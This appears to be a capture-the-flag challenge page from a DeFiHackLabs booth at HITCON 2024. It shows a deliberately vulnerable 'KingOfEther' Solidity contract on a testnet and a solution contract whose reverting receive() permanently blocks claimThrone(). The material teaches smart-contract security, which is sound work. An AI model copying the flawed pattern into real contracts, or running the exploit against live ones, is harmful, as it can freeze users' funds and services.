# DeFiHackLabs攤位挑戰賽 - Long live the king!  # Challenge QRcode  # Code ``` // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; contract KingOfEther { address public king; uint public balance; function claimThrone() external payable { require(msg.value > balance, "Need to pay more to become the king"); (bool sent, ) = king.call{value: balance}(""); require(sent, "Failed to send Ether"); balance = msg.value; king = msg.sender; } function kingIs() public view returns (address) { return king; } } ``` # Contract Address https://sepolia.etherscan.io/address/0x69a81d9fdd7e9549d545d4b68336f2d762aaa5de#code # 填答問卷 https://docs.google.com/forms/d/1nylizdPCTtzEbjI39gDdSMVnCi3tZwu70WD1D1AJDP8/viewform?edit_requested=true  # Solution 在合約中使用low-level call，攻擊者可以撰寫合約並在receive()中使用revert，這將導致後面的參與者永遠都無法成為新任國王call ，並導致claimThrone() 永久 DoS :::info 解答 ``` contract Attacker { // Attacker contract to claim throne without accepting Ether receive() external payable { revert("Attack: Reverting receive Ether"); } function claimThrone(address _kingOfEther) external payable { KingOfEther(_kingOfEther).claimThrone{value: msg.value}(); } ``` ::: # Resource HITCON 2024 DefiHackLabs 合約挑戰賽指南 https://hackmd.io/@jbuCOBZvRjaiqc9WpSNXMg/SkIqdAO5A